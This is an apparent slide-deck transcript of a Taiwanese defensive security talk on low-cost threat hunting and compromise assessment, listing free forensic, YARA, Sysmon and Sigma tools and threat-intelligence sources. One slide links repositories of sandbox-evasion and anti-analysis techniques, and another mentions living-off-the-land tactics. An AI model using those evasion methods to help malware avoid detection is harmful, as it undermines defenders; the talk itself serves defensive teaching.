Threat Hunting & Compromised Assessment on the cheap 101

Transcript

1. whoami 證照: • CEH CHFI • Palo Alto Network ACE

   • McAfee Vulnerability Manager 經歷: • 協助檢調單位偵辦重大網路犯罪 • 建置企業APT防護 • 協助企業資安事件處理 專長: • Incident Response / Compromised Assessment / Malware Analysis • Penetration Testing & Exploit Research • Security Solution Implementation • APT(Gateway/Mail/Sandbox/End point) • NGFW & NGIPS • Endpoint/Managed Detection and Response

2. 老闆跟我們的夢想…

3. CyberSec 101 偵測威脅機制DETECT Threat Hunting & Compromised Assessment on the

   cheap 101

4. Agenda 1. What is Threat Hunting & Compromised Assessment 2.

   Hunting and Assessment Cycle 3. How to… On the Cheap… A. Host B. Network C. Intelligence 4. Conclusion

5. 1. What is Threat Hunting & Compromised Assessment

6. 5 Why we need??? (1) • 企業的入侵向量(Initial Access) • The

   initial access tactic represents the vectors adversaries use to gain an initial foothold within a network. • 駭客怎麼打進來的方法…

7. 6 Why we need??? (2) 沙箱繞過與反分析 • https://github.com/a0rtega/pafis h •

   https://github.com/AlicanAkyol/s ems/ • https://github.com/LordNotewort hy/al-khaser • https://github.com/marcusbotaci n/Anti.Analysis • https://github.com/ricardojrdez/a nti-analysis-tricks • https://github.com/google/sandb ox-attacksurface-analysis-tools

8. Why we need??? (3) LOLBAS • Only pre-installed software is

   used by the attacker and no additional binary executables are installed onto the system 7

9. Why we need??? (4) 合法掩護非法 • SoftEther VPN是一個由筑波大學研究生Daiyuu Nobori（登太游）因碩士論文 而開發的開源、跨平台、多重協定的虛擬私人網路方案，此方案讓一些虛擬私人

   網路協定像是SSL VPN 、L2TP、IPsec、OpenVPN以及微軟SSTP都由同一個單 一VPN伺服器提供。 • 北韓網軍LAZURUS攻擊事件也使用該VPN工具作為跳板使用 8

10. Alerting vs Hunting ALERTING (AUTOMATIC) • Reactive: Focus on known

    threats HUNTING (MANUAL) • Proactive: Focus on new threats TI – threat intelligence MA – malwareanalysis DF – digital forensics IR – incident response

11. Threat Hunting. What is It? • Cyber threat hunting is

    the practice of searching iteratively through data to detect advanced threats that evade traditional security solutions. (sqrrl) • “Searching for persistent threats that have evaded existing security controls”(Delta Risk)

12. Compromise Assessment (1) • A compromise assessment is a high-level

    review of the organization that does not rely on a hypothesis or limited scope in order to answer a very fundamental question: am I compromised? In other words, based upon your organization’s data, logs, and existing telemetry, are there any indicators of compromise, or threat actors present in the environment? (Cisco) • “A proactive time-bound effort to detect threats that have evaded existing security controls”(Delta Risk) • 台灣好像叫 木馬檢測 or 資安健檢的惡意軟體檢視 & 網路流量及記錄檔 分析 …

13. Compromise Assessment (2) Definitionally, compromise assessment should be: • Focused

    - On detecting malicious software and unauthorized activity within the organization • Time Bound - Assessments are short duration with high intensity generally completed with hours/days • Affordable - Organization should be able to conduct them regularly • Independent - Should not depend on in-place detection tools , which may have missed the threat in the first place

14. 2. Hunting and Assessment Cycle

15. Cycle Look at your network(Log) and your hosts(Log) General Hunt

    methodology • Collect data (收好收滿跟監控) • Analyze collection (分析) • Follow up on leads (追蹤線索) • Remediate (處理修復) • Repeat (循環持續 or 定期進行)

16. 3.A How to … On the Cheap … Host

17. 收 (IR Toolkit) https://github.com/diogo-fernan/ir-rescue • activity: user activity data •

    disk: disk data • events: Windows event logs • filesystem: data related with NTFS and files • malware: system data that can be used to spot malware • memory: the memory • network: network data • registry: system and user registry • system: system-related information • web: browsing history and caches.

18. Yara Scan • https://github.com/Yara-Rules/rules • https://github.com/Neo23x0/signature-base/tree/master/yara

19. Sandbox • https://www.one-tab.com/page/0weIQ1SfQqmTbQGJ__wbBw

20. SYSMON • https://github.com/nshalabi/SysmonTools

21. None

22. LINUX 相關好文匯整 • https://www.one-tab.com/page/3tLqOfx8T8qkCDp4dDm6_Q

23. 22 MacOS Assessment • KnockKnock (類似微軟三寶之Autoruns)

24. 23 MacOS Assessment • TaskExplorer (類似微軟三寶之ProcessExplorer)

25. https://github.com/orlikoski

26. 3.A How to … On the Cheap … Network

27. Sigma • https://github.com/Neo23x0/sigma • Sigma is for log files what

    Snort is for network traffic and YARA is for files.

28. sigmac • python sigmac --target splunk app_python_sql_exceptions.yml -c sysmon

29. https://uncoder.io

30. 2019/ 2 甚麼叫 奇怪的PATTERN

31. sigma2 • https://docs.google.com/spreadsheets/d/1pjgXD9ABpXwWFKPMr 2R7wIyCz1VbQZjyDCA8ciIAsRw/edit?usp=sharing

32. SOCPRIME

33. MITRE ATT&CK Detection Assessment

34. 3.C How to … On the Cheap … Intelligence

35. 威脅情資 情資蒐集方法及來源 • IR • VIRUSTOTAL Yara Hunting • Threat

    Hunting (Anomaly Detection) • OSINT • Twitter • https://github.com/hslatman/awesome-threat- intelligence • https://www.one- tab.com/page/higRMQLCTxaBpuYO0_JEuA • https://github.com/CyberMonitor/APT_CyberCri minal_Campagin_Collections • 客戶提供之不明樣本分析及後續關聯 • Honeypot( Open Proxy、Tor node) • 各大資安設備情資萃取 • 主動木馬檢測 情資類別 • 弱點及漏洞 • 中繼站 • 駭客手法

36. 9 V.S 14 • 台視 • 中視 • 民視 •

    華視 • 東森 • 年代 • 中天 • 三立 • 非凡 • 八大關鍵基礎設施 • 六都區域聯防 35

37. 台灣威脅情資的現實 • 「台灣 G-ISAC 成立於 2009，發 展至 2019 ISAC 數量已超越台灣

    有線電視新聞台，期許情資品質 也要超越新聞台」

38. What is Compromised Assessment? • https://www.one-tab.com/page/GoxG9XzdTbe3N47cc2_Kpw

39. 4. Conclusion

40. 資安沒有百分之百 唯有讓駭客入侵的成本提高 The cyber adversary's tactics flow like water, seeking

    the path of least resistance. Plan accordingly. - Sun Tzu, The Art of Cyber War -

41. 被入侵並不可恥 是否有真正回饋及改善 The competent cyber warrior learns from their mistakes.

    The cyber master learns from the mistakes & knowhow of others. - Sun Tzu, The Art of Cyber War -

42. Thank You